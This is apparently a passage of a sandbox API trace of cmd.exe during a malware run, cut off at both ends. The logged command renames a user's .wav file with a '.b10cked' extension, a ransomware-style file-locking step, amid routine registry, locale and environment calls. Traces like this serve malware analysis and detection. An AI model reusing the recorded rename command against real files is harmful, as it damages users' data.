() returned 0xf00 [0227.357] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf00) returned 0x38 [0227.357] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.357] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.357] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.357] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fee4 | out: phkResult=0x30fee4*=0x0) returned 0x2 [0227.357] VirtualQuery (in: lpAddress=0x30ff1b, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0227.357] GetConsoleOutputCP () returned 0x1b5 [0227.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.358] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.359] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.359] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.359] GetEnvironmentStringsW () returned 0xa01b0* [0227.359] FreeEnvironmentStringsW (penv=0xa01b0) returned 1 [0227.359] GetEnvironmentStringsW () returned 0xa01b0* [0227.359] FreeEnvironmentStringsW (penv=0xa01b0) returned 1 [0227.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee54 | out: phkResult=0x30ee54*=0x40) returned 0x0 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0xe8, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x0, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegCloseKey (hKey=0x40) returned 0x0 [0227.360] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee54 | out: phkResult=0x30ee54*=0x40) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: 
lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x0, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegCloseKey (hKey=0x40) returned 0x0 [0227.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bb [0227.360] srand (_Seed=0x5b8863bb) [0227.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" [0227.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" [0227.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.361] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.361] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.361] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.361] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.361] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.361] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.362] GetEnvironmentStringsW () returned 0xa2300* [0227.362] FreeEnvironmentStringsW (penv=0xa2300) returned 1 [0227.362] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.362] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.362] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.362] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.362] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.362] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.362] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.362] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc20 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.362] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc20, lpFilePart=0x30fc1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc1c*="Desktop") returned 0x18 [0227.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.362] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f99c | out: lpFindFileData=0x30f99c) returned 0xa0040 [0227.363] FindClose (in: hFindFile=0xa0040 | out: hFindFile=0xa0040) returned 1 [0227.363] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.364] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.364] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.364] GetEnvironmentStringsW () returned 0xa2b20* [0227.364] FreeEnvironmentStringsW (penv=0xa2b20) returned 1 [0227.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.364] GetConsoleOutputCP () returned 0x1b5 [0227.365] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.365] GetUserDefaultLCID () returned 0x409 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 
2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd60, cchData=128 | out: lpLCData="0") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd60, cchData=128 | out: lpLCData="0") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd60, cchData=128 | out: lpLCData="1") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") returned 2 [0227.365] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.366] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.367] GetConsoleTitleW (in: lpConsoleTitle=0x90900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.367] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.367] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c 
[0227.367] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.367] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.368] _wcsicmp (_String1="move", _String2=")") returned 68 [0227.368] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0227.368] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0227.368] _wcsicmp (_String1="IF", _String2="move") returned -4 [0227.368] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0227.368] _wcsicmp (_String1="REM", _String2="move") returned 5 [0227.368] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0227.372] GetConsoleTitleW (in: lpConsoleTitle=0x30fa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.468] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0227.468] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0227.468] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="CD") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0227.468] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="REN") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0227.468] _wcsicmp (_String1="move", _String2="SET") returned -6 [0227.468] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0227.468] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0227.468] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0227.468] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0227.468] _wcsicmp (_String1="move", _String2="MD") returned 11 [0227.468] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0227.468] _wcsicmp (_String1="move", _String2="RD") 
returned -5 [0227.468] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0227.468] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0227.469] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0227.469] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0227.469] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0227.469] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="VER") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0227.469] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0227.469] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0227.469] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0227.469] _wcsicmp (_String1="move", _String2="START") returned -6 [0227.469] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0227.469] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0227.469] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0227.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0227.471] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f814, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f80c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0227.471] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0227.472] _wcsnicmp 
(_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0227.472] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0227.473] _wcsnicmp (_String1="COPYCMD", 
_String2="SystemR", _MaxCount=0x7) returned -16 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0227.473] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0227.474] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0227.474] _wcsicmp (_String1="CII3ZM~1.WAV", _String2=".") returned 53 [0227.474] _wcsicmp (_String1="CII3ZM~1.WAV", _String2="..") returned 53 [0227.474] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm~1.wav")) returned 0x20 [0227.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.475] SetErrorMode (uMode=0x0) returned 0x0 [0227.475] SetErrorMode (uMode=0x1) returned 0x0 [0227.475] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", nBufferLength=0x104, lpBuffer=0x30f19c, lpFilePart=0x30f184 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", lpFilePart=0x30f184*="CII3ZM~1.WAV") returned 0x33 [0227.475] SetErrorMode (uMode=0x0) returned 0x1 [0227.475] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x10 [0227.475] _wcsicmp (_String1="CII3ZM~1.WAV", _String2=".") returned 53 [0227.475] _wcsicmp (_String1="CII3ZM~1.WAV", _String2="..") returned 53 [0227.475] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV" 
(normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm~1.wav")) returned 0x20 [0227.475] SetErrorMode (uMode=0x0) returned 0x0 [0227.476] SetErrorMode (uMode=0x1) returned 0x0 [0227.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", nBufferLength=0x104, lpBuffer=0x30f618, lpFilePart=0x30f3b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", lpFilePart=0x30f3b0*="CII3ZM~1.WAV") returned 0x33 [0227.476] SetErrorMode (uMode=0x0) returned 0x1 [0227.476] SetErrorMode (uMode=0x0) returned 0x0 [0227.476] SetErrorMode (uMode=0x1) returned 0x0 [0227.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", nBufferLength=0x104, lpBuffer=0x30f820, lpFilePart=0x30f3b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", lpFilePart=0x30f3b0*="cii3Zm5ag7.wav.b10cked") returned 0x3d [0227.476] SetErrorMode (uMode=0x0) returned 0x1 [0227.477] SetLastError (dwErrCode=0x0) [0227.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav.b10cked")) returned 0xffffffff [0227.478] GetLastError () returned 0x2 [0227.478] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", fInfoLevelId=0x1, lpFindFileData=0x30ed2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ed2c) returned 0x90ef0 [0227.479] FindNextFileW (in: hFindFile=0x90ef0, lpFindFileData=0x30ed2c | out: lpFindFileData=0x30ed2c) returned 0 [0227.481] GetLastError () returned 0x12 [0227.481] FindClose (in: hFindFile=0x90ef0 | out: hFindFile=0x90ef0) returned 1 [0227.482] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV", fInfoLevelId=0x1, lpFindFileData=0xa1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0xa1c30) returned 0x90ef0 [0227.483] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", nBufferLength=0x104, lpBuffer=0x30efc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked", lpFilePart=0x0) returned 0x3d [0227.483] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", nBufferLength=0x104, lpBuffer=0x30efc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", lpFilePart=0x0) returned 0x35 [0227.483] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\cii3zm5ag7.wav")) returned 0x20 [0227.483] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav" (normalized: 